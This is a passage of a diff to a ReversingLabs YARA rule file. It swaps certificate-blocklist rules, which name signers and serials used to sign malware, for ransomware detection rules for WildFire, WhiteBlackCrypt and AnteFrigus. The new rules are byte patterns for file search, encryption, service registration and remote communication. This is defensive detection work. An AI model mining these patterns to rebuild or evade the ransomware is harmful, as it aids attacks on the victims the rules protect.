?? ?? FF 75 ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 8B 45 ?? 8B 70 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 56 8B 45 + ?? 8B 40 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B + 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 EB ?? 83 7D ?? ?? 74 ?? 8D 95 ?? + ?? ?? ?? 8B 4D ?? 8B 45 ?? 8B 30 FF 56 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? + B9 ?? ?? ?? ?? 8B 45 ?? 8B 30 FF 56 ?? 8B C3 8B 55 ?? 8B 52 ?? E8 ?? ?? ?? ?? 33 C0 + 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 + } -rule REVERSINGLABS_Cert_Blocklist_1121Ed568764E75Be35574448Feadefcd3Bc : INFO FILE + condition: + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($remote_connection_p*)) +} +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wildfire : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects WildFire ransomware." author = "ReversingLabs" - id = "44fa007f-f5f7-5001-8b92-eb4a657ea756" - date = "2023-11-08" - modified = "2023-11-08" + id = "0c44f017-703c-5db7-b777-62fcd181af9a" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L351-L367" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3316a2536920c5aa9dd627cec7678e6fe33c722b4830dd740009c20dd013c9ab" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.WildFire.yara#L1-L77" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d3be2eac7967853aae6e1317d9c22d95a3dc4b3e5bf8acbe97a7bbeabc9eab38" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WildFire" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 00 02 19 17 73 ?? ?? ?? ?? 0A 1B 8D ?? ?? ?? ?? 25 16 02 16 02 [5-10] 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? A2 25 17 [5-10] A2 25 18 7E ?? ?? ?? ?? A2 25 19 [5-10] A2 25 1A 02 02 + [5-10] 6F ?? ?? ?? ?? 17 D6 6F ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0B 07 [5-10] 28 ?? ?? ?? + ?? 1A 18 73 ?? ?? ?? ?? 0C 08 21 00 00 00 00 00 00 00 00 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? + 8D ?? ?? ?? ?? 0D 21 00 00 00 00 00 00 00 00 13 ?? 06 6F ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? + ?? 13 ?? 08 11 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? + 2B ?? 06 09 16 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 09 16 11 ?? 6F ?? ?? ?? ?? 11 + ?? 11 ?? 6A D6 13 ?? 11 ?? 11 ?? FE ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 08 + 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? + ?? 28 ?? ?? ?? ?? DE ?? 2A + } + $enum_drives = { + 00 00 28 ?? ?? ?? ?? 1F ?? 0A 18 0C 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 0C 28 ?? ?? ?? ?? 0D 1A + 0C 09 13 ?? 16 13 ?? 11 ?? 11 ?? 8E 69 FE ?? 2C ?? 11 ?? 11 ?? 9A 13 ?? 1B 0C 11 ?? + 6F ?? ?? ?? ?? 2C ?? 1C 0C 11 ?? 6F ?? ?? ?? ?? 19 FE ?? 16 FE ?? 65 18 60 1A 60 11 + ?? 6F ?? ?? ?? ?? 21 ?? ?? ?? ?? ?? ?? ?? ?? FE ?? 16 FE ?? 65 5F 16 FE ?? 2C ?? 1D + 0C 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1E 0C 11 ?? 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B + } + $file_search = { + A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] + A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 0D 19 0C 19 8D ?? ?? ?? ?? + 25 16 [5-10] A2 25 17 [5-10] A2 25 18 [5-10] A2 13 04 1A 0C 02 28 ?? ?? ?? ?? 13 ?? 1B + 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? (30 | 3D) [1-4] 1C 0C 11 ?? 11 ?? 9A 28 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1D 0C 09 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 9A [5-10] 6F + ?? ?? ?? ?? 16 FE ?? 5F 11 ?? 11 ?? 9A 1F ?? 28 ?? ?? ?? ?? [5-10] 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 16 FE ?? 5F 11 ?? [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 5F 2C ?? 1E 0C 11 ?? 11 ?? + 9A 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? (38 | 2B) [1-4] 1F ?? 0C 02 28 ?? ?? ?? ?? + 13 ?? 1F ?? 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? 30 ?? 1F ?? 0C 11 ?? 11 ?? + 11 ?? 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE ?? 2C ?? 1F ?? 0C 11 ?? 11 ?? 9A 28 ?? ?? + ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B ?? 1F ?? 0C 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F + ?? ?? ?? ?? 8E 69 17 DA 18 FE ?? 16 FE ?? 2C ?? 1F ?? 0C 02 16 28 ?? ?? ?? ?? DD ?? ?? + ?? ?? 07 17 58 16 0B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? + ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? + ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? + ?? ?? ?? ?? ?? ?? ?? ?? ?? DE + } + $remote_server_communication_1 = { + 00 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 9A [5-10] 28 ?? + ?? ?? ?? 0B 02 [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 02 [5-10] 16 28 ?? ?? ?? + ?? 16 FE ?? 39 ?? ?? ?? ?? 1D 8D ?? ?? ?? ?? 25 16 [5-10] A2 25 17 02 A2 25 18 [5-10] A2 + 25 19 7E ?? ?? ?? ?? A2 25 1A [5-10] A2 25 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1C [5-10] + A2 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? + [5-10] 11 ?? 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07 + 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? [5-10] 6F ?? ?? ?? ?? 11 ?? [5-10] 6F ?? ?? ?? ?? + 11 ?? 11 ?? 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? + ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? + 74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FRINORTE COMERCIO DE PECAS E SERVICOS LTDA - ME" and pe.signatures[i].serial=="11:21:ed:56:87:64:e7:5b:e3:55:74:44:8f:ea:de:fc:d3:bc" and 1385337599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $enum_drives and $file_search and $encrypt_files and $remote_server_communication_1 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6Ed2450Ceac0F72E73Fda1727E66E654 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Whiteblackcrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects WhiteBlackCrypt ransomware." author = "ReversingLabs" - id = "c19ddbde-eec0-5ebb-8f11-1e7dcb489bc8" - date = "2023-11-08" - modified = "2023-11-08" + id = "9855c10d-563d-54e0-bc79-945daef947de" + date = "2021-07-05" + modified = "2021-07-05" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L369-L385" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0e5af7795c825367d441c8abc2aa835fa83083eb8ee1f723c7d2dacff1ca88ff" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.WhiteBlackCrypt.yara#L1-L91" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "37b95cc3412f2f2d02d19c4c15b529c4f67453cb195627b5bab2f353e7602354" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WhiteBlackCrypt" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 41 57 41 56 41 55 41 54 55 57 56 53 48 83 EC ?? 4C 8D 3D ?? ?? ?? ?? 45 31 F6 49 89 + CD E8 ?? ?? ?? ?? 48 85 C0 49 89 C4 0F 84 ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 + C0 0F 84 ?? ?? ?? ?? 48 8D 68 ?? 4C 89 FA 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D + 15 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 44 89 F0 48 83 C9 ?? 48 89 EF F2 + AE 4C 89 EF 48 89 CB 48 83 C9 ?? F2 AE 48 F7 D3 48 F7 D1 01 D9 48 63 D9 48 89 D9 E8 + ?? ?? ?? ?? 48 89 D9 4C 89 EA 48 89 C6 48 89 C7 44 89 F0 F3 AA 48 89 F1 E8 ?? ?? ?? + ?? 48 8D 15 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 48 89 EA 48 89 F1 E8 ?? ?? ?? ?? 48 + 89 F1 E8 ?? ?? ?? ?? 48 89 F1 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 89 + F1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E1 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E + 41 5F E9 ?? ?? ?? ?? 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E 41 5F C3 + } + $encrypt_files = { + 41 55 41 54 55 57 56 53 48 83 EC ?? 48 8D 15 ?? ?? ?? ?? 31 F6 4C 8D 2D ?? ?? ?? ?? + 48 89 CD E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C3 E8 ?? ?? ?? ?? 48 89 C7 49 89 D9 41 + B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 85 C0 49 89 C4 74 ?? 81 FE ?? + ?? ?? ?? 7F ?? 45 89 E0 48 89 FA 4C 89 E9 E8 ?? ?? ?? ?? 45 31 C0 89 F2 48 89 D9 E8 + ?? ?? ?? ?? 44 01 E6 4D 63 C4 48 89 F9 49 89 D9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 31 + C0 89 F2 48 89 D9 E8 ?? ?? ?? ?? EB ?? 48 89 F9 48 89 EF E8 ?? ?? ?? ?? 48 89 D9 E8 + ?? ?? ?? ?? 31 C0 48 83 C9 ?? F2 AE 48 89 CE 48 F7 D6 48 89 F1 48 83 C1 ?? E8 ?? ?? + ?? ?? 48 89 EA 48 89 C1 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? + 48 89 E9 48 89 C2 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D E9 + } + $register_service_p1 = { + 57 56 53 48 81 EC ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 31 C0 41 B9 ?? ?? ?? ?? 48 8D 94 + 24 ?? ?? ?? ?? 48 89 CB B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 D7 F3 AB 48 8D + 44 24 ?? 48 89 54 24 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 + C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 48 8B 35 ?? ?? ?? + ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 41 B8 ?? ?? ?? ?? 48 89 DA FF 15 + ?? ?? ?? ?? 48 8D 44 24 ?? 45 31 C0 41 B9 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? + ?? ?? 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8D 05 ?? ?? ?? ?? 48 8B + 4C 24 ?? 41 B9 ?? ?? ?? ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 + 89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? + 45 31 C0 48 89 D9 FF 15 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 31 C9 FF D6 48 85 C0 79 ?? + B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 31 C9 BA ?? ?? + ?? ?? 48 C1 E0 ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? + ?? 48 8D 35 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 48 8D + } + $register_service_p2 = { + 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 + 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 41 B9 ?? ?? ?? ?? 48 89 F2 48 89 1D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? + 48 8B 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? + ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D6 B9 ?? ?? ?? ?? 48 89 C3 FF 15 ?? + ?? ?? ?? BA ?? ?? ?? ?? 48 89 D9 49 89 C0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D + 54 24 ?? 48 89 C1 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 41 B9 ?? ?? + ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? + ?? ?? ?? ?? 48 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? 99 F7 F9 2D ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 99 F7 F9 31 C9 48 8D 15 ?? ?? ?? + ?? 2D ?? ?? ?? ?? 89 44 24 ?? FF D6 BA ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 + D9 FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8D 5C 24 ?? 45 31 C9 45 31 C0 31 D2 48 + 89 D9 FF D6 85 C0 74 ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? EB ?? + 8B 84 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5E 5F C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hohhot Handing Trade and Business Co., Ltd." and pe.signatures[i].serial=="6e:d2:45:0c:ea:c0:f7:2e:73:fd:a1:72:7e:66:e6:54" and 1376092799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($register_service_p*)) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_32665079C5A5854A6833623Ca77Ff5Ac : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Antefrigus : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects AnteFrigus ransomware." author = "ReversingLabs" - id = "7078e95f-8bbe-5446-b9cb-c079f8448cb1" - date = "2023-11-08" - modified = "2023-11-08" + id = "903ac92c-1a4a-5645-92db-d00b3bfd6ada" + date = "2021-03-05" + modified = "2021-03-05" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L387-L403" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6b734ca733c5fbadcb490ffd4c19c951e0fc17dd9b660eca948b126038c42cdb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.AnteFrigus.yara#L1-L210" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b84c01da0ee97a4eb8bf099c71094f994feb4c7185ad75b8b2ccda5eee283a92" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "AnteFrigus" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 68 ?? ?? ?? ?? 8B D0 + 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 83 65 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 + ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 C0 8D 7D + ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A ?? 8B 7A ?? 2B + CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B 12 57 52 51 8B + CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? + ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D ?? 51 50 51 8D + 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 83 65 ?? ?? 8D 4D ?? 83 65 ?? ?? 50 E8 ?? + ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 83 7D ?? ?? 8B 55 ?? 0F 43 75 ?? 85 D2 74 ?? 83 C9 ?? + 8D 42 ?? 3B C1 0F 42 C8 03 CE EB ?? 3B CE 74 ?? 49 80 39 ?? 75 ?? 2B CE EB ?? 83 C9 + ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 71 ?? C7 45 ?? ?? ?? ?? ?? C6 45 + } + $find_files_p2 = { + 3B D6 0F 82 ?? ?? ?? ?? 2B D6 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 7D ?? ?? 51 0F + 43 45 ?? 8D 4D ?? 03 C6 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 45 ?? 50 83 + 61 ?? ?? 83 61 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 70 ?? 03 30 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? + ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? + C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? + ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? + ?? 03 F3 59 3B F7 75 ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? + ?? 03 F3 3B F7 75 ?? 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? + 59 59 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E8 + } + $remote_connection_p1 = { + 55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? + ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43 + 8D ?? ?? ?? ?? 03 F9 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? 0F 43 B5 ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? ?? ?? 33 DB 8B C7 89 9D + } + $remote_connection_p2 = { + 2B C6 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 